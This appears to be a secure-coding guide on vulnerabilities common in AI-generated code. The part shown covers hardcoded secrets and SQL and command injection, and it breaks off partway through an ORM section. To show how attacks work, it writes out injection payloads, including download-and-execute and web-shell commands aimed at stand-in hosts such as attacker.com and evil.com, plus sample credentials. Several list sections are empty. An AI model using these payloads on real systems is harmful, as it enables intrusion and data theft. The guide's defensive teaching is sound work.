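This document provides an in-depth analysis of the 7 most common and most critical security vulnerabilities in AI-generated code. Each vulnerability pattern is covered comprehensively, including:
These 7 patterns were selected with a weighted priority scoring system (see [[Ranking-Matrix]]) based on the following factors: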
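| Factor | Weight | Description |
|---|---|---|
| Frequency | 2x | How often AI generates this vulnerability |
| Severity | 2x | Impact if exploited (remote code execution, data breach, etc.) |
| Detectability | 1x | How easily it is missed during code review |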
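These selected patterns account for the vast majority of security incidents in AI-generated code. Research shows:
All code examples in this document are pseudocode intended to illustrate security patterns across languages. When implementing:
The examples use a generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages.
For developers:
For security engineers:
For AI/LLM context:
This document takes an in-depth look at the most critical security anti-patterns. Each section includes multiple examples, edge cases, and detailed explanations. All code is pseudocode; implement it using the secure patterns of your target language. Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. These patterns are the root cause of most security vulnerabilities in AI-generated code.
When generating code, you MUST:
This document covers the following patterns in detail: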
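| Rank | Pattern | Priority Score | Key Risk |
|---|---|---|---|
| 1 | Hardcoded Secrets and Credential Management | 23 | Immediate credential theft and exploitation |
| 2 | SQL Injection and Command Injection | 22/21 | Full database access, arbitrary code execution |
| 3 | Cross-Site Scripting (XSS) | 23 | Session hijacking, account takeover |
| 4 | Authentication and Session Security | 22 | Complete authentication bypass |
| 5 | Cryptographic Failures | 18-20 | Data decryption, credential exposure |
| 6 | Input Validation and Data Sanitization | 21 | Root cause enabling all injection attacks |
| 7 | Dependency Risks (Slopsquatting) | 24 | Supply chain compromise, malware execution |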
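Priority scores are calculated as: (Frequency x 2) + (Severity x 2) + Detectability
Document version: 1.0.0
Last updated: January 18, 2026
Based on research from: GitHub security advisories, USENIX studies, Veracode reports, CWE Top 25 (2025), OWASP guidelines
CWE References: CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key)
Priority Score: 23 (Frequency: 9, Severity: 8, Detectability: 6)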
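Hardcoded secrets are among the most widespread and dangerous vulnerabilities in AI-generated code. The root of the problem lies in the training data itself:
Why AI models generate hardcoded secrets:
1. Training data contains examples: Tutorials, documentation, Stack Overflow answers, and even some GitHub repositories contain placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code.
2. Copy-paste culture in training data: When developers share code snippets online, they often include credentials for the sake of completeness. The AI learns that "complete" code includes connection strings with embedded passwords.
3. Documentation examples conflated with production code: Training data does not clearly distinguish documentation examples (which may show `API_KEY = "your-api-key-here"`) from production patterns. The model treats both as valid approaches.
4. Context window limitations: When generating code, the AI cannot see your `.env` file or secrets manager configuration. It generates standalone code that "works", which usually means code with hardcoded values.
5. Helpfulness bias: AI models tend to provide complete, runnable code. When a user asks to "connect to my database", the model generates a full connection string rather than a partial template that requires configuration.
Impact statistics: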
// VULNERABLE: API key hardcoded directly in source
class PaymentService:
API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"
API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d"
function processPayment(amount, currency, cardToken):
headers = {
"Authorization": "Bearer " + this.API_KEY,
"Content-Type": "application/json"
}
payload = {
"amount": amount,
"currency": currency,
"source": cardToken,
"api_key": this.API_KEY // Also exposed in request body
}
return httpPost("https://api.payment.com/charges", payload, headers)
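Why this is dangerous:
- The `sk_live_` prefix indicates real (live) credentials
- The webhook secret (`whsec_`) lets an attacker forge webhook events

// VULNERABLE: Full connection string with credentials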
DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production"
// Alternative bad patterns:
DB_CONFIG = {
"host": "10.0.1.50",
"port": 5432,
"database": "customers",
"user": "app_service",
"password": "Tr0ub4dor&3" // Password in config object
}
// Connection string builder - still vulnerable
function getConnection():
return createConnection(
host = "database.internal",
user = "root",
password = "admin123", // Hardcoded in function
database = "app_data"
)
Why this is dangerous:
// VULNERABLE: JWT secret as a constant
JWT_CONFIG = {
"secret": "my-super-secret-jwt-key-that-should-never-be-shared",
"algorithm": "HS256",
"expiresIn": "24h"
}
function generateToken(userId, role):
payload = {
"sub": userId,
"role": role,
"iat": currentTimestamp()
}
return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm)
function verifyToken(token):
return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret
Why this is dangerous:
// VULNERABLE: OAuth credentials in client-side code
const OAUTH_CONFIG = {
clientId: "1234567890-abcdef.apps.googleusercontent.com",
clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend!
redirectUri: "https://myapp.com/callback",
scopes: ["email", "profile", "calendar.readonly"]
}
function initiateOAuthFlow():
// Client secret visible in browser dev tools
authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", {
"client_id": OAUTH_CONFIG.clientId,
"client_secret": OAUTH_CONFIG.clientSecret, // Exposed!
"redirect_uri": OAUTH_CONFIG.redirectUri,
"scope": OAUTH_CONFIG.scopes.join(" "),
"response_type": "code"
})
redirect(authUrl)
Why this is dangerous:
// VULNERABLE: Private key as a string constant
RSA_PRIVATE_KEY = """
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB
bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-----END RSA PRIVATE KEY-----
"""
function signDocument(document):
signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256")
return signature
function decryptMessage(encryptedData):
return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY)
Why this is dangerous:
// SECURE: Load credentials from environment
class PaymentService:
function __init__():
this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY")
this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET")
// Fail fast if credentials missing
if this.apiKey is null or this.apiSecret is null:
throw ConfigurationError("Payment credentials not configured")
function processPayment(amount, currency, cardToken):
headers = {
"Authorization": "Bearer " + this.apiKey,
"Content-Type": "application/json"
}
payload = {
"amount": amount,
"currency": currency,
"source": cardToken
// No API key in payload
}
return httpPost("https://api.payment.com/charges", payload, headers)
// Usage in application startup
// Environment variables set externally (shell, container, deployment)
// $ export PAYMENT_API_KEY="sk_live_..."
// $ export PAYMENT_API_SECRET="whsec_..."
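The pseudocode above could look roughly like this in Python. This is a minimal sketch, not a definitive implementation: `require_env`, `ConfigurationError`, and `auth_headers` are illustrative names, and the environment variable names are simply carried over from the pseudocode.

```python
import os


class ConfigurationError(RuntimeError):
    """Raised when a required credential is missing from the environment."""


def require_env(name: str) -> str:
    """Return the value of environment variable `name`, or fail fast."""
    value = os.environ.get(name)
    if not value:  # an unset variable and an empty string are both rejected
        raise ConfigurationError(f"{name} is not configured")
    return value


class PaymentService:
    def __init__(self) -> None:
        # Variable names mirror the pseudocode; adjust them to your deployment.
        self.api_key = require_env("PAYMENT_API_KEY")
        self.api_secret = require_env("PAYMENT_API_SECRET")

    def auth_headers(self) -> dict[str, str]:
        # The key travels only in the Authorization header, never in the body.
        return {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json",
        }
```

Failing in the constructor means a misconfigured deployment stops at startup instead of at the first payment request.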
Why this is secure:
// SECURE: Retrieve secrets from dedicated secrets manager
class SecretManager:
function __init__(vaultUrl, roleId, secretId):
// Even vault credentials can come from environment
this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL")
this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID")
this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID")
this.token = null
this.tokenExpiry = null
function authenticate():
response = httpPost(this.vaultUrl + "/v1/auth/approle/login", {
"role_id": this.roleId,
"secret_id": this.secretId
})
this.token = response.auth.client_token
this.tokenExpiry = currentTime() + response.auth.lease_duration
function getSecret(path):
if this.token is null or currentTime() > this.tokenExpiry:
this.authenticate()
response = httpGet(
this.vaultUrl + "/v1/secret/data/" + path,
headers = {"X-Vault-Token": this.token}
)
return response.data.data
// Usage
secretManager = new SecretManager()
dbPassword = secretManager.getSecret("database/production").password
apiKey = secretManager.getSecret("payment/stripe").api_key
Why this is secure:
// SECURE: Dependency injection of configuration
interface IConfig:
function getDatabaseUrl(): string
function getApiKey(): string
function getJwtSecret(): string
class EnvironmentConfig implements IConfig:
function getDatabaseUrl():
return getEnvironmentVariable("DATABASE_URL")
function getApiKey():
return getEnvironmentVariable("API_KEY")
function getJwtSecret():
return getEnvironmentVariable("JWT_SECRET")
class VaultConfig implements IConfig:
secretManager: SecretManager
function getDatabaseUrl():
return this.secretManager.getSecret("db/url").value
function getApiKey():
return this.secretManager.getSecret("api/key").value
function getJwtSecret():
return this.secretManager.getSecret("jwt/secret").value
// Application uses interface - doesn't know where secrets come from
class Application:
config: IConfig
function __init__(config: IConfig):
this.config = config
function connectDatabase():
return createConnection(this.config.getDatabaseUrl())
// Bootstrap based on environment
if getEnvironmentVariable("USE_VAULT") == "true":
config = new VaultConfig(new SecretManager())
else:
config = new EnvironmentConfig()
app = new Application(config)
Why this is secure:
// SECURE: Platform-specific secure credential storage
// For server applications - use instance metadata
class CloudCredentialProvider:
function getDatabaseCredentials():
// AWS: Use IAM database authentication
token = awsRdsGenerateAuthToken(
hostname = getEnvironmentVariable("DB_HOST"),
port = 5432,
username = getEnvironmentVariable("DB_USER")
// No password - uses IAM role attached to instance
)
return {"username": getEnvironmentVariable("DB_USER"), "token": token}
function getApiCredentials():
// Retrieve from AWS Secrets Manager
response = awsSecretsManager.getSecretValue(
SecretId = getEnvironmentVariable("API_SECRET_ARN")
)
return parseJson(response.SecretString)
// For CLI/desktop applications - use OS keychain
class DesktopCredentialProvider:
function storeCredential(service, account, credential):
// Uses OS keychain (Keychain on macOS, Credential Manager on Windows)
keychain.setPassword(service, account, credential)
function getCredential(service, account):
return keychain.getPassword(service, account)
// Usage
cloudProvider = new CloudCredentialProvider()
dbCreds = cloudProvider.getDatabaseCredentials()
connection = createConnection(
host = getEnvironmentVariable("DB_HOST"),
user = dbCreds.username,
authToken = dbCreds.token, // Short-lived token, not password
sslMode = "verify-full"
)
Why this is secure:
// DANGEROUS: Test credentials that can slip into production
// In test file - seems safe
TEST_API_KEY = "sk_test_4242424242424242"
TEST_DB_PASSWORD = "testpassword123"
// But then someone copies test code to production helper:
function quickTest():
// "Temporary" - but stays forever
client = createClient(apiKey = "sk_test_4242424242424242")
return client.ping()
// Or conditionals that fail:
function getApiKey():
if isProduction():
return getEnvironmentVariable("API_KEY")
else:
return "sk_test_4242424242424242" // What if isProduction() has a bug?
// SECURE ALTERNATIVE: Use environment variables even for tests
function getApiKey():
key = getEnvironmentVariable("API_KEY")
if key is null:
throw ConfigurationError("API_KEY environment variable required")
return key
Detection: Search the codebase for `_test_`, `_dev_`, `test123`, `password123`, `example`, and `placeholder`.
// DANGEROUS: Secrets in CI/CD configuration files
// .github/workflows/deploy.yml (WRONG)
env:
AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
// docker-compose.yml committed to repo (WRONG)
services:
db:
environment:
POSTGRES_PASSWORD: mysecretpassword
// SECURE: Use CI/CD platform's secrets management
// .github/workflows/deploy.yml (CORRECT)
env:
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
// docker-compose.yml (CORRECT)
services:
db:
environment:
POSTGRES_PASSWORD: ${POSTGRES_PASSWORD}  # From environment
Detection: Audit CI/CD configuration files, Docker Compose files, and Kubernetes manifests for hardcoded credentials.
// DANGEROUS: Secrets in Dockerfile or image layers
// Dockerfile (WRONG - secrets baked into image)
FROM node:18
ENV API_KEY=sk_live_xxxxxxxxxxxxx
RUN echo "password123" > /app/.pgpass
COPY config-with-secrets.json /app/config.json
// Even if you delete later, it's in a layer:
# Still recoverable from image layers!
RUN rm /app/.pgpass
// SECURE: Use build secrets or runtime injection
// Dockerfile (CORRECT)
FROM node:18
# No secrets in build context
// docker-compose.yml with runtime secrets
services:
app:
environment:
API_KEY: ${API_KEY}  # From host environment
secrets:
- db_password
secrets:
db_password:
external: true  # From Docker Swarm secrets or similar
// Or use Docker BuildKit secrets for build-time needs
# syntax=docker/dockerfile:1.2
FROM node:18
RUN --mount=type=secret,id=npm_token \
NPM_TOKEN=$(cat /run/secrets/npm_token) npm install
Detection: Use `docker history --no-trunc <image>` to inspect image layers for secrets.
// DANGEROUS: Secrets leaked through logging
function connectToDatabase(config):
logger.info("Connecting with config: " + toJson(config))
// Logs: {"host": "db.com", "user": "admin", "password": "secret123"}
function makeApiRequest(url, headers, body):
logger.debug("Request: " + url + " Headers: " + toJson(headers))
// Logs: Authorization: Bearer sk_live_xxxxx
function handleError(error):
logger.error("Error: " + error.message + " Stack: " + error.stack)
// Stack trace might contain secrets from variables
// SECURE: Sanitize before logging
function sanitizeForLogging(obj):
sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"]
result = deepCopy(obj)
for key in result.keys():
if any(sensitive in key.lower() for sensitive in sensitiveKeys):
result[key] = "[REDACTED]"
return result
function connectToDatabase(config):
logger.info("Connecting with config: " + toJson(sanitizeForLogging(config)))
// Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"}
// Or use structured logging with secret types
class Secret:
value: string
function toString(): return "[SECRET]"
function toJson(): return "[SECRET]"
function getValue(): return this.value // Only accessible explicitly
Detection: Search logs for patterns such as `password=`, `token=`, `key=`, bearer tokens, and connection strings.
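As a rough Python counterpart to the logging pseudocode above, the sketch below redacts nested structures as well as top-level keys. The marker list is copied from the pseudocode; `sanitize_for_logging`, `Secret`, and `get_value` are illustrative names, and substring matching is an assumption that will also redact harmless keys such as `author`.

```python
from typing import Any

SENSITIVE_MARKERS = ("password", "secret", "key", "token", "auth", "credential")


def sanitize_for_logging(value: Any) -> Any:
    """Return a copy of `value` with sensitive-looking fields redacted."""
    if isinstance(value, dict):
        return {
            k: "[REDACTED]"
            if any(marker in str(k).lower() for marker in SENSITIVE_MARKERS)
            else sanitize_for_logging(v)
            for k, v in value.items()
        }
    if isinstance(value, (list, tuple)):
        return [sanitize_for_logging(item) for item in value]
    return value


class Secret:
    """Wrapper whose string forms never reveal the wrapped value."""

    def __init__(self, value: str) -> None:
        self._value = value

    def __repr__(self) -> str:
        return "[SECRET]"

    __str__ = __repr__

    def get_value(self) -> str:
        # The only way to read the raw value; easy to search for in review.
        return self._value
```

Because the function builds a new structure rather than mutating its input, the original configuration object stays usable for the actual connection.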
// project/.env (NEVER COMMIT THIS)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=sk_live_xxxxxxxxxx
JWT_SECRET=my-secret-key
// .gitignore (MUST INCLUDE)
.env
.env.local
.env.*.local
*.pem
*.key
credentials.json
secrets.yaml
// CORRECT: Commit a template instead
// project/.env.example (SAFE TO COMMIT)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=your_api_key_here
JWT_SECRET=generate_a_secure_random_string
// Add pre-commit hook to prevent accidental commits
// .git/hooks/pre-commit
#!/bin/bash
if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then
echo "ERROR: Attempting to commit potential secrets file"
exit 1
fi
Detection: Check the Git history: `git log --all --full-history -- "*.env" "*credentials*" "*secrets*"`
// DANGEROUS: Secrets exposed in error handling
function connectToPaymentApi():
try:
apiKey = getApiKey()
response = httpPost(
"https://api.payment.com/connect",
headers = {"Authorization": "Bearer " + apiKey}
)
catch error:
// Exposes API key in error log and potentially to users
throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error)
// SECURE: Never include secrets in error messages
function connectToPaymentApi():
try:
apiKey = getApiKey()
response = httpPost(
"https://api.payment.com/connect",
headers = {"Authorization": "Bearer " + apiKey}
)
catch error:
// Log correlation ID, not secrets
correlationId = generateUUID()
logger.error("Payment API connection failed", {
"correlationId": correlationId,
"errorCode": error.code,
"endpoint": "api.payment.com"
// No API key!
})
throw new Error("Payment service unavailable. Reference: " + correlationId)
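A possible Python rendering of the secure error-handling pattern is sketched below. The `send` parameter is a hypothetical transport callable standing in for `httpPost`, and `PaymentUnavailable` is an illustrative exception name; neither comes from a real library.

```python
import logging
import uuid

logger = logging.getLogger("payments")


class PaymentUnavailable(Exception):
    """Error that is safe to surface to callers: it carries no secret material."""


def connect_to_payment_api(api_key: str, send) -> object:
    """Call `send(headers)`; on failure, log and re-raise without the key."""
    try:
        return send({"Authorization": f"Bearer {api_key}"})
    except Exception as exc:
        correlation_id = str(uuid.uuid4())
        # Log only the exception type: str(exc) might echo the request headers.
        logger.error(
            "Payment API connection failed",
            extra={"correlation_id": correlation_id, "error_type": type(exc).__name__},
        )
        # "from None" keeps the original exception out of the chained traceback.
        raise PaymentUnavailable(
            f"Payment service unavailable. Reference: {correlation_id}"
        ) from None
```

The correlation ID lets an operator find the log entry from a user report without either side ever seeing the credential.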
// DANGEROUS: Secrets in URL query parameters
function makeAuthenticatedRequest(endpoint, apiKey):
// API keys in URLs are logged everywhere:
// - Browser history
// - Server access logs
// - Proxy logs
// - Referrer headers
url = "https://api.service.com" + endpoint + "?api_key=" + apiKey
return httpGet(url)
// Even worse with multiple secrets:
url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey
// SECURE: Use headers for authentication
function makeAuthenticatedRequest(endpoint, apiKey):
return httpGet(
"https://api.service.com" + endpoint,
headers = {
"Authorization": "Bearer " + apiKey,
// Or API-specific header
"X-API-Key": apiKey
}
)
Detection: Search for URLs containing `?api_key=`, `?token=`, `?secret=`, or `?password=`.
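The detection step can be automated with the standard library's URL parser. The sketch below is one way to do it; the `SECRET_PARAMS` set is an assumed starting list, and `secret_query_params` is an illustrative name.

```python
from urllib.parse import parse_qsl, urlsplit

# Parameter names treated as secret-bearing; extend this for your own APIs.
SECRET_PARAMS = {"api_key", "apikey", "key", "token", "secret", "password"}


def secret_query_params(url: str) -> list[str]:
    """Return the names of query parameters in `url` that look like secrets."""
    query = urlsplit(url).query
    return [
        name
        for name, _ in parse_qsl(query, keep_blank_values=True)
        if name.lower() in SECRET_PARAMS
    ]
```

Running a check like this over access logs or an HTTP client wrapper flags offending URLs by parameter name, without printing the secret values themselves.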
// High-confidence patterns to search for:
// 1. Direct assignment to suspicious variable names
regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i
// 2. Common API key formats
regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/
// 3. Private key markers
regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/
// 4. Connection strings with passwords
regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/
// 5. Base64 encoded secrets (often JWT secrets)
regex: /["'][A-Za-z0-9+\/=]{40,}["']/
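The five patterns above can be wired into a small line-by-line scanner. The sketch below transcribes them into Python's `re` syntax; the pattern labels and the `scan_text` function are illustrative, and a dedicated secret-scanning tool will usually have broader coverage and fewer false positives.

```python
import re

SECRET_PATTERNS = {
    "suspicious assignment": re.compile(
        r"""(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']""",
        re.IGNORECASE,
    ),
    "known key prefix": re.compile(
        r"(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)"
    ),
    "private key block": re.compile(
        r"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"
    ),
    "connection string": re.compile(
        r"(mysql|postgresql|mongodb|redis)://[^:]+:[^@]+@"
    ),
    "long base64-like literal": re.compile(r"""["'][A-Za-z0-9+/=]{40,}["']"""),
}


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line_number, pattern_name) for every pattern hit in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings
```

The function reports line numbers and pattern names only, so the scanner's own output does not become another place where secrets leak.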
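| Check | What to look for |
|---|---|
| Constants | Any string constants in authentication or configuration code |
| Config objects | Credential fields containing non-placeholder values |
| Connection code | Database connections and API clients with inline credentials |
| Test files | Test credentials that may be real, or may become real later |
| CI/CD | Pipeline configs, Dockerfiles, deployment scripts |
| Comments | "TODO: move to env" comments that contain actual secrets |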
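- `.gitignore` includes all secret file patterns (`.env`, `*.pem`, etc.)

CWE References: CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection)
Priority Score: 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6)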
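SQL injection and command injection are among the oldest vulnerability classes, yet they continue to plague AI-generated code at an alarming rate. Despite decades of secure-coding education and well-established mitigations, AI models still consistently generate vulnerable code.
Why AI models generate injection vulnerabilities:
1. Training data contamination: Research indicates that string-concatenated queries appear "thousands of times" in the GitHub repositories used as AI training data. In historical codebases, this vulnerable pattern is statistically more common than the secure one.
2. Simplicity bias: String concatenation is syntactically simpler than parameterized queries. AI models aim to produce "working code", and concatenation requires fewer tokens and fewer concepts.
3. Lack of adversarial awareness: AI models do not inherently consider that user input may be malicious. When asked to "query a user by ID", the model focuses on the functional requirement, not the security implications.
4. Prevalence of tutorial code: Many tutorials and documentation examples show vulnerable patterns for the sake of brevity. The AI learns that the `f"SELECT * FROM users WHERE id = {id}"` pattern is valid.
5. Context limitations: The AI has no visibility into your full application architecture, threat model, or data flow. It does not know which inputs come from untrusted sources.
Impact statistics: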
// VULNERABLE: Direct string concatenation
function getUserById(userId):
query = "SELECT * FROM users WHERE id = " + userId
return database.execute(query)
// Even worse with f-string/template literal
function getUserByEmail(email):
query = f"SELECT * FROM users WHERE email = '{email}'"
return database.execute(query)
// Attack: email = "' OR '1'='1' --"
// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --'
// Returns ALL users in the database
Why this is dangerous:
- The `' OR '1'='1` pattern bypasses authentication
- Comment sequences (`--`, `#`, `/**/`) can truncate the rest of the query

// VULNERABLE: User-controlled table name
function getDataFromTable(tableName, id):
query = f"SELECT * FROM {tableName} WHERE id = {id}"
return database.execute(query)
// Attack: tableName = "users; DROP TABLE users; --"
// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1
// VULNERABLE: User-controlled column names
function sortUsers(sortColumn, sortOrder):
query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}"
return database.execute(query)
// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)"
// Result: Data exfiltration through error messages or timing
Why this is dangerous:
// VULNERABLE: ORDER BY with user input
function getProductList(category, sortBy):
query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}"
return database.execute(query, [category])
// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1)
// LIKE 'a%' THEN price ELSE name END)"
// Result: Boolean-based blind SQL injection
// Attack: sortBy = "IF(1=1, price, name)"
// Result: Confirms SQL injection is possible
Why this is dangerous:
// VULNERABLE: Unescaped LIKE pattern
function searchProducts(searchTerm):
query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'"
return database.execute(query)
// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --"
// Result: UNION-based data extraction
// Even "safer" version has issues:
function searchProductsSafe(searchTerm):
query = "SELECT * FROM products WHERE name LIKE ?"
return database.execute(query, [f"%{searchTerm}%"])
// Attack: searchTerm = "%" (matches everything - DoS through performance)
// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure)
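One way to close the wildcard gap in the parameterized version above is to escape `%` and `_` in the search term and declare the escape character in the query. The sketch below uses Python's `sqlite3` module; `escape_like` and the `products` schema are illustrative, and `ESCAPE` clause syntax varies slightly between databases.

```python
import sqlite3


def escape_like(term: str, escape_char: str = "\\") -> str:
    """Escape LIKE wildcards so `term` only matches itself literally."""
    return (
        term.replace(escape_char, escape_char * 2)  # escape the escape char first
        .replace("%", escape_char + "%")
        .replace("_", escape_char + "_")
    )


def search_products(conn: sqlite3.Connection, term: str) -> list[str]:
    # The surrounding % are the only wildcards; user input is matched literally.
    pattern = f"%{escape_like(term)}%"
    rows = conn.execute(
        "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\' ORDER BY name",
        (pattern,),
    )
    return [name for (name,) in rows]
```

Escaping removes the wildcard behavior but not the cost of a substring scan, so a minimum term length or a result limit is still worth considering for the performance concern noted above.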
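Why this is dangerous:
- The wildcards `%` and `_` are valid data in a parameterized query, but they remain dangerous inside a LIKE pattern.

// VULNERABLE: Query that allows stacking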
function updateUserEmail(userId, newEmail):
query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}"
database.execute(query, multiStatement = true)
// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --"
// Result: Creates new admin account
// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --"
// Result: Mass password reset for all admins
Why this is dangerous:
// VULNERABLE: Direct command construction
function pingHost(hostname):
command = "ping -c 4 " + hostname
return shell.execute(command)
// Attack: hostname = "127.0.0.1; cat /etc/passwd"
// Result: ping -c 4 127.0.0.1; cat /etc/passwd
// Executes both commands
// VULNERABLE: Using shell=True with format strings
function checkDiskUsage(directory):
command = f"du -sh {directory}"
return subprocess.run(command, shell=True)
// Attack: directory = "/tmp; rm -rf /"
// Result: Destructive command execution
Why this is dangerous:
- Shell metacharacters (`;`, `|`, `&`, `$()`, backticks) enable command chaining

// VULNERABLE: File path from user input
function convertImage(inputFile, outputFile):
command = f"convert {inputFile} -resize 800x600 {outputFile}"
return shell.execute(command)
// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash"
// Result: Downloads and executes malware
// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg"
// Result: File exfiltration via command substitution
// VULNERABLE: Filename in archiving
function createBackup(filename):
command = f"tar -czf backup.tar.gz {filename}"
return shell.execute(command)
// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh"
// Result: tar option injection (GTFOBins-style attack)
Why this is dangerous:
- `$(...)` and backticks execute subcommands

// VULNERABLE: Arguments from user input
function fetchUrl(url):
command = f"curl {url}"
return shell.execute(command)
// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php"
// Result: Writes file to webserver (web shell)
// Attack: url = "--config /etc/passwd"
// Result: Error message reveals file contents
// VULNERABLE: Git commands with user input
function cloneRepository(repoUrl):
command = f"git clone {repoUrl}"
return shell.execute(command)
// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo"
// Result: Arbitrary command execution via git options
Why this is dangerous:
- `--` does not always prevent injection (it depends on the specific program)

// VULNERABLE: User-controlled environment variable
function runWithCustomPath(command, customPath):
environment = {"PATH": customPath}
return subprocess.run(command, env=environment, shell=True)
// Attack: customPath = "/tmp/evil:$PATH"
// If /tmp/evil contains malicious 'ls' binary, it executes instead
// VULNERABLE: Library path manipulation
function loadPlugin(pluginPath):
environment = {"LD_PRELOAD": pluginPath}
return subprocess.run("target-app", env=environment)
// Attack: pluginPath = "/tmp/evil.so"
// Result: Malicious shared library loaded, code execution
Why this is dangerous:
// SECURE: Parameterized query - positional parameters
function getUserById(userId):
query = "SELECT * FROM users WHERE id = ?"
return database.execute(query, [userId])
// SECURE: Named parameters
function getUserByEmailAndStatus(email, status):
query = "SELECT * FROM users WHERE email = :email AND status = :status"
return database.execute(query, {email: email, status: status})
// SECURE: Multiple value insertion
function createUser(name, email, role):
query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)"
return database.execute(query, [name, email, role])
// SECURE: IN clause with dynamic count
function getUsersByIds(userIds):
placeholders = ", ".join(["?" for _ in userIds])
query = f"SELECT * FROM users WHERE id IN ({placeholders})"
return database.execute(query, userIds)
// SECURE: Transaction with multiple parameterized queries
function transferFunds(fromId, toId, amount):
database.beginTransaction()
try:
database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId])
database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId])
database.commit()
catch error:
database.rollback()
throw error
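For a concrete instance of the positional-parameter and dynamic `IN` patterns, here is a minimal sketch using Python's built-in `sqlite3` module. The `users` schema and function names are assumptions for illustration; other drivers use different placeholder styles (for example `%s` or `:name`).

```python
import sqlite3


def get_user_by_email(conn: sqlite3.Connection, email: str):
    # The driver sends `email` as data; it is never parsed as SQL.
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ?", (email,)
    ).fetchall()


def get_users_by_ids(conn: sqlite3.Connection, user_ids: list[int]):
    if not user_ids:  # many databases reject an empty "IN ()", so short-circuit
        return []
    placeholders = ", ".join("?" for _ in user_ids)
    # Only the number of "?" marks is interpolated, never the values themselves.
    query = f"SELECT id, email FROM users WHERE id IN ({placeholders}) ORDER BY id"
    return conn.execute(query, user_ids).fetchall()
```

With this approach the classic `' OR '1'='1' --` payload is compared as a literal email address and simply matches no rows.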
Why this is secure:
// SECURE: ORM with typed queries
function getUserById(userId):
return User.findOne({where: {id: userId}})
// SECURE: ORM with relationships
function getUserWithOrders(userId):
return User.findOne({
where: {id: userId},
include: [{model: Order, as: 'orders'}]
})
// SECURE: ORM query builder
function searchProducts(filters):
query = Product.query()
if filters.category:
query = query.where('category', '=', filters.category)
if filters.minPrice:
query = query.where('price', '>=', filters.minPrice)
if filters.maxPrice:
query = query.where('price', '<=', filters.maxPrice)
return query.get()
// WARNING: ORM raw query - still needs parameterization!
function customQuery(userId):
// STILL VULNERABLE if using string interpolation:
